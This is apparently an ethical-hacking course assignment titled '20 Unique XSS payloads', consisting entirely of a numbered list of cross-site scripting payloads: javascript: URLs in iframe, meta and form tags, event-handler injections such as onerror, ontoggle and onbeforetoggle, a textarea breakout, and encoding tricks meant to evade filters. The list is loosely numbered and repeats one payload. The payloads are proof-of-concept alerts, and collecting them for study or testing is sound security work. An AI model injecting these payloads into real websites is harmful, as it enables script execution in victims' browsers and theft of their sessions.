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SURE TRUST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G5-Cybersecutity And Ethical Hacking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By:SUFIYA HAFIZ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: 20 Unique XSS payloads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&lt;iframe %00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src="&amp;Tab;javascript:prompt(1)&amp;Tab;"%00&gt;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2)&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;'&lt;iframe/onload=confirm(1)&gt;’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3)&lt;meta http-equiv="refresh" content="0;url=javascript:confirm(1)"&gt;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4)&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME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&lt;audio src=1 onerror=alert(1)&gt;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&lt;IMG DYN id=XSS SRC="javascript:alert('XSS')"&gt;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&lt;BGSOUND id=XSS SRC="javascript:alert('XSS');"&gt;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&lt;div onmouseover="alert('XSS');"&gt;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&lt;/textarea&gt;'"&gt;&lt;script&gt;alert(XSS)&lt;/script&gt;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&lt;INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');"&gt;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&lt;marquee width=1 loop=1 onfinish=alert(1)&gt;XSS&lt;/marquee&gt;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&lt;body onunhandledrejection=alert(1)&gt;&lt;script&gt;fetch('//xyz')&lt;/script&gt;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&lt;xss oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block&gt;test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&lt;xss onkeyup="alert(1)" contenteditable style=display:block&gt;test&lt;/xss&gt;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&lt;xss onmouseover="alert(1)" style=display:block&gt;test&lt;/xss&gt;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&lt;xss class=progress-bar-animated onanimationstart=alert(1)&gt;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&lt;details ontoggle=alert(1) open&gt;test&lt;/details&gt;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 &lt;body onunhandledrejection=alert(1)&gt;&lt;script&gt;fetch('//xyz')&lt;/script&gt;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 &lt;button popovertarget=x&gt;Click me&lt;/button&gt;&lt;xss onbeforetoggle=alert(1) popover id=x&gt;XSS&lt;/xss&gt;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 &lt;xss onmousewheel=alert(1) style=display:block&gt;requires scrolling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